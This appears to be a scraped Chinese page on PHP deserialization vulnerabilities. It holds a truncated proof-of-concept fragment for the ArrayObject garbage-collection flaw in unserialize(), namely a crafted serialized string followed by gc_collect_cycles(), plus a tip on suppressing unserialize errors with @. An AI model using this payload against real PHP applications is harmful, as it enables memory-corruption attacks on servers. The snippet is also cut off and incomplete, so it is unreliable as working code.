rwhn.net
当前位置:首页 >> php反序列化漏洞 >>

php反序列化漏洞

// POC of the ArrayObject GC vulnerability$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';$outer_array = unserialize($serialized_string);gc_collect_cycles();$filler1 = "aaaa";$fill...

加@ 可以禁止提示错误 ,但程序会正常运行 如下 if(false !== @unserialize($arr)){

网站首页 | 网站地图
All rights reserved Powered by www.rwhn.net
copyright ©right 2010-2021。
内容来自网络,如有侵犯请联系客服。zhit325@qq.com